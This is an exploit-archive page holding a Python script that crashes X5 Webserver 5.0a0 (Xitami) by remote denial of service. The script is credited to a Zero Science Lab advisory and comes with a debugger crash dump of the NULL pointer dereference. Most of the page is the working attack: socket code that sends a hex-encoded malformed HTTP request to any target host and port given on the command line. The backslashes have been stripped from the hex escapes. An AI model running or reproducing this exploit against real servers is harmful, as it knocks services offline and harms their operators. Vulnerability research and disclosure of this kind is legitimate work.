X5 Webserver 5.0 Remote Denial Of Service Exploit
Posted on 30 November -0001
<HTML><HEAD><TITLE>X5 Webserver 5.0 Remote Denial Of Service Exploit</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>#!/usr/bin/env python # # # X5 Webserver 5.0 Remote Denial Of Service Exploit # # # Vendor: iMatrix # Product web page: http://www.xitami.com # Affected version: 5.0a0 # # Summary: X5 is the latest generation web server from iMatix Corporation. # The Xitami product line stretches back to 1996. X5 is built using iMatix's # current Base2 technology for multithreading applications. On multicore machines, # it is much more scalable than Xitami/2. # # Desc: The vulnerability is caused due to a NULL pointer dereference when processing # malicious HEAD and GET requests. This can be exploited to cause denial of service # scenario. # # ---------------------------------------------------------------------------- # # (12c0.164c): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # *** WARNING: Unable to verify checksum for C:zslabws64327xitami-5.0a0-windowsxitami.exe # *** ERROR: Module load completed but symbols could not be loaded for C:zslabws64327xitami-5.0a0-windowsxitami.exe # eax=0070904d ebx=03a91808 ecx=0070904d edx=00000000 esi=0478fef4 edi=0478fe8c # eip=00503ae0 esp=0478fb28 ebp=0478fb48 iopl=0 nv up ei pl zr na pe nc # cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 # xitami+0x103ae0: # 00503ae0 8b02 mov eax,dword ptr [edx] ds:002b:00000000=???????? # 0:004> kb # # ChildEBP RetAddr Args to Child # WARNING: Stack unwind information not available. Following frames may be wrong. # 00 0478fb48 00460ee6 0ace0840 04025ea0 0478fd78 xitami+0x103ae0 # 01 0478fe8c 0045f6fa 0ace0bd8 0478ff28 cccccccc xitami+0x60ee6 # 02 0478fee8 004c60a1 0478ff14 00000000 0478ff38 xitami+0x5f6fa # 03 0478ff28 004fdca3 03a90858 03a67e38 00000000 xitami+0xc60a1 # 04 0478ff40 00510293 03a90858 fc134d7d 00000000 xitami+0xfdca3 # 05 0478ff7c 00510234 00000000 0478ff94 7679338a xitami+0x110293 # 06 0478ff88 7679338a 03a91808 0478ffd4 77029902 xitami+0x110234 # 07 0478ff94 77029902 03a91808 7134bcc2 00000000 kernel32!BaseThreadInitThunk+0xe # 08 0478ffd4 770298d5 00510190 03a91808 00000000 ntdll!__RtlUserThreadStart+0x70 # 09 0478ffec 00000000 00510190 03a91808 00000000 ntdll!_RtlUserThreadStart+0x1b # # ---------------------------------------------------------------------------- # # Tested on: Microsoft Windows XP Professional SP3 (EN) # Microsoft Windows 7 Ultimate SP1 (EN) # # # Vulnerability discovered by Stefan Petrushevski aka sm - <stefan@zeroscience.mk> # # # Advisory ID: ZSL-2016-5377 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5377.php # # # 15.11.2016 # import sys, socket if len(sys.argv) < 3: print '------- X5 Webserver 5.0a0 - Remote Denial of Service ------ ' print ' Usage: ' + sys.argv[0] + ' <target> <port> ' print 'Example: ' + sys.argv[0] + ' 8.8.8.8 80 ' print '------------------------------------------------------------ ' sys.exit(0) host = sys.argv[1] port = int(sys.argv[2]) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((host, port)) s.settimeout(666) payload = ( 'x47x45x54x20x2fx50x52x4ex20x48x54x54x50x2fx31x2ex31x0dx0a' 'x48x6fx73x74x3ax20x31x37x32x2ex31x39x2ex30x2ex32x31x35x0d' 'x0ax55x73x65x72x2dx41x67x65x6ex74x3ax20x5ax53x4cx2dx46x75' 'x7ax7ax65x72x2dx41x67x65x6ex74x2fx34x2ex30x2ex32x38x35x20' 'x0dx0ax41x63x63x65x70x74x3ax20x74x65x78x74x2fx78x6dx6cx2c' 'x61x70x70x6cx69x63x61x74x69x6fx6ex2fx78x6dx6cx2cx61x70x70' 'x6cx69x63x61x74x69x6fx6ex2fx78x68x74x6dx6cx2bx78x6dx6cx2c' 'x74x65x78x74x2fx68x74x6dx6cx3bx71x3dx30x2ex39x2cx74x65x78' 'x74x2fx70x6cx61x69x6ex3bx71x3dx30x2ex38x2cx69x6dx61x67x65' 'x2fx70x6ex67x2cx2ax2fx2ax3bx71x3dx30x2ex35x0dx0ax41x63x63' 'x65x70x74x2dx4cx61x6ex67x75x61x67x65x3ax20x65x6ex2dx75x73' 'x2cx65x6ex3bx71x3dx30x2ex35x0dx0ax41x63x63x65x70x74x2dx45' 'x6ex63x6fx64x69x6ex67x3ax20x67x7ax69x70x2cx64x65x66x6cx61' 'x74x65x0dx0ax41x63x63x65x70x74x2dx43x68x61x72x73x65x74x3a' 'x20x49x53x4fx2dx38x38x35x39x2dx31x2cx75x74x66x2dx38x3bx71' 'x3dx30x2ex37x2cx2ax3bx71x3dx30x2ex37x0dx0ax4bx65x65x70x2d' 'x41x6cx69x76x65x3ax20x33x30x30x0dx0ax43x6fx6ex6ex65x63x74' 'x69x6fx6ex3ax20x6bx65x65x70x2dx61x6cx69x76x65x0dx0ax0dx0a' ) s.send(payload) s.close print 'BOOM! ' </BODY></HTML>